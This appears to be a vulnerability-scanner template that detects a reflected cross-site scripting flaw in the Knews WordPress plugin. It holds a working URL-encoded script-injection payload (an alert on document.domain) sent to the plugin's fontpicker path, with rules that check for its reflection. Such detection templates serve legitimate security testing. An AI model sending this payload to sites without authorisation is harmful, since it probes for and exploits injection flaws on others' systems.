id: wp-knews-xss

info:
  name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS)
  author: daffainfo
  severity: medium
  reference: https://www.securityfocus.com/bid/54330/info
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
